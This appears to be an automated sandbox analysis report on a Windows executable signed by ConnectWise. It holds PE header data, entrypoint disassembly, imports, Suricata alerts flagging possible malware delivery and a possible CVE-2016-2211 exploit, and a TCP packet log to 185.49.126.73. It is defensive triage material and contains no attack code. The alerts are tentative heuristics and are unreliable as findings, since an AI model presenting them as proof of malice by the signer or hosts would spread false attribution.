Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x401489
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x671FCCB3 [Mon Oct 28 17:41:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	37d5c89163970dd3cc69230538a1b72b

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	17/08/2022 01:00:00 16/08/2025 00:59:59
Subject Chain	CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version:	3
Thumbprint MD5:	AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1:	4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256:	82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial:	0B9360051BCCF66642998998D5BA97CE

Entrypoint Preview

Instruction
call 00007FAF3CBF359Ah
jmp 00007FAF3CBF304Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040B048h]
push dword ptr [ebp+08h]
call dword ptr [0040B044h]
push C0000409h
call dword ptr [0040B04Ch]
push eax
call dword ptr [0040B050h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040B054h]
test eax, eax
je 00007FAF3CBF31D7h
push 00000002h
pop ecx
int 29h
mov dword ptr [004118C0h], eax
mov dword ptr [004118BCh], ecx
mov dword ptr [004118B8h], edx
mov dword ptr [004118B4h], ebx
mov dword ptr [004118B0h], esi
mov dword ptr [004118ACh], edi
mov word ptr [004118D8h], ss
mov word ptr [004118CCh], cs
mov word ptr [004118A8h], ds
mov word ptr [004118A4h], es
mov word ptr [004118A0h], fs
mov word ptr [0041189Ch], gs
pushfd
pop dword ptr [004118D0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004118C4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004118C8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004118D4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00411810h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1060c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x11800	0x2d80
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14000	0xddc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xfe38	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xfd78	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9cf8	0x9e00	bae4521030709e187bdbe8a34d7bf731	False	0.6035650712025317	data	6.581464957368758	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x5d58	0x5e00	5885f441ed28e3701c5e80bf46cb5c4b	False	0.4178440824468085	Applesoft BASIC program data, first line number 1	4.8432689099793915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x11cc	0x800	04a548a5c04675d08166d3823a6bf61b	False	0.16357421875	data	2.0120795802951505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x13000	0x1e0	0x200	aa256780346be2e1ee49ac6d69d2faff	False	0.52734375	data	4.703723272345726	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14000	0xddc	0xe00	908329e10a1923a3c4938a10d44237d9	False	0.7776227678571429	data	6.495696626464028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x13060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW

CRYPT32.dll

CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-13T18:26:44.799338+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49742	TCP
2024-11-13T18:26:46.308689+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49745	TCP
2024-11-13T18:26:51.070357+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49749	TCP
2024-11-13T18:26:52.521895+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.4	49751	TCP
2024-11-13T18:26:52.597570+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49750	TCP
2024-11-13T18:26:55.675275+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49752	TCP
2024-11-13T18:26:57.772280+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49753	TCP
2024-11-13T18:26:59.266495+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49754	TCP
2024-11-13T18:27:00.656243+0100	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	185.49.126.73	443	192.168.2.4	49755	TCP
2024-11-13T18:27:12.284590+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.4	57318	TCP
2024-11-13T18:27:13.885602+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.4	57319	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 18:26:34.874675989 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:34.874720097 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:34.874804020 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:34.916363001 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:34.916450977 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:35.757541895 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:35.757816076 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:35.865467072 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:35.865557909 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:35.866508007 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:35.910749912 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.496400118 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.539359093 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.860382080 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.860404015 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.860414028 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.860430956 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.860457897 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.860604048 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.860605001 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.860686064 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.860755920 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.862646103 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.862703085 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.862745047 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.862765074 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.862798929 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.910643101 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.975923061 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.975938082 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.975987911 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.976027966 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.976062059 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.976078987 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.976104975 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.976975918 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.976990938 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.977066994 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.977081060 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.977122068 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.978384018 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.978398085 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.978441000 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.978452921 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.978478909 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.978485107 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.980304956 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.980320930 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.980382919 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:36.980396986 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:36.980437994 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:37.093797922 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:37.093873024 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:37.093918085 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:37.093949080 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:37.093965054 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:37.093971968 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:37.093987942 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:37.094007015 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:37.094044924 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:37.101654053 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:37.101761103 CET	443	49731	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:37.101813078 CET	49731	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:37.511837959 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:37.511876106 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:37.511955023 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:37.512160063 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:37.512175083 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.361293077 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.361397028 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:38.363445997 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:38.363461971 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.363904953 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.365149975 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:38.411338091 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.725245953 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.725306988 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.725352049 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.725420952 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:38.725450993 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.725501060 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.725625992 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:38.725625992 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:38.725625992 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:38.725637913 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.725686073 CET	443	49735	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:38.725735903 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:38.726763964 CET	49735	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:43.434302092 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:43.434370995 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:43.434447050 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:43.434822083 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:43.434838057 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.299633980 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.309942961 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.309976101 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.670137882 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.670218945 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.670267105 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.670293093 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.670346022 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.670362949 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.670412064 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.677798033 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.677875042 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.677879095 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.677896976 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.677932024 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.723166943 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.786789894 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.786858082 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.786897898 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.786916018 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.786948919 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.786959887 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.799380064 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.799432039 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.799468040 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.799477100 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.799508095 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.799515963 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.800972939 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.801018953 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.801048040 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.801054955 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.801083088 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.801090956 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.900779963 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.900851965 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.900882006 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.900899887 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.900923967 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.900949955 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.901525021 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.901606083 CET	443	49742	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.901669025 CET	49742	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.918057919 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.918112040 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:44.919616938 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.919979095 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:44.919996023 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:45.784058094 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:45.784363985 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:45.787329912 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:45.787347078 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:45.787688017 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:45.806835890 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:45.847383976 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.174442053 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.174500942 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.174542904 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.174622059 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.174663067 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.174680948 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.174719095 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.183130026 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.183185101 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.183249950 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.183259010 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.183290958 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.223181009 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.291249990 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.291311026 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.291357994 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.291392088 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.291410923 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.291448116 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.308751106 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.308821917 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.308856964 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.308868885 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.308902025 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.309626102 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.309717894 CET	443	49745	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.309789896 CET	49745	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.319071054 CET	49746	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.319169044 CET	443	49746	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:46.319273949 CET	49746	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.319458008 CET	49746	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:46.319492102 CET	443	49746	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:47.164393902 CET	443	49746	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:47.164547920 CET	49746	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:47.166533947 CET	49746	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:47.166554928 CET	443	49746	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:47.166898012 CET	443	49746	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:47.194010019 CET	49746	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:47.235378981 CET	443	49746	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:47.433078051 CET	443	49746	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:47.488966942 CET	49746	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:47.488995075 CET	443	49746	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:47.490597963 CET	49746	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:47.490787983 CET	443	49746	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:47.490987062 CET	49746	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:47.496351957 CET	49747	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:47.496424913 CET	443	49747	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:47.496522903 CET	49747	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:47.496772051 CET	49747	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:47.496788979 CET	443	49747	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:48.330177069 CET	443	49747	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:48.330240965 CET	49747	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:48.331672907 CET	49747	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:48.331682920 CET	443	49747	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:48.332075119 CET	443	49747	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:48.333580017 CET	49747	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:48.375341892 CET	443	49747	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:48.570190907 CET	443	49747	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:48.613773108 CET	49747	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:48.613811970 CET	443	49747	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:48.615020037 CET	49747	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:48.615205050 CET	443	49747	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:48.615277052 CET	49747	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:48.620383024 CET	49748	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:48.620456934 CET	443	49748	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:48.620527029 CET	49748	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:48.620753050 CET	49748	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:48.620769978 CET	443	49748	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:49.457504034 CET	443	49748	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:49.457669973 CET	49748	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:49.460813046 CET	49748	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:49.460824966 CET	443	49748	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:49.461150885 CET	443	49748	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:49.461949110 CET	49748	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:49.503346920 CET	443	49748	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:49.701524973 CET	443	49748	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:49.754374027 CET	49748	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:49.754400969 CET	443	49748	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:49.754941940 CET	49748	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:49.755027056 CET	443	49748	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:49.755079031 CET	49748	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:49.758785963 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:49.758843899 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:49.758900881 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:49.759110928 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:49.759124041 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:50.591526985 CET	443	49749	185.49.126.73	192.168.2.4
Nov 13, 2024 18:26:50.593029976 CET	49749	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:26:50.593992949 CET	49749	443	192.168.2.4	185.49.126.73
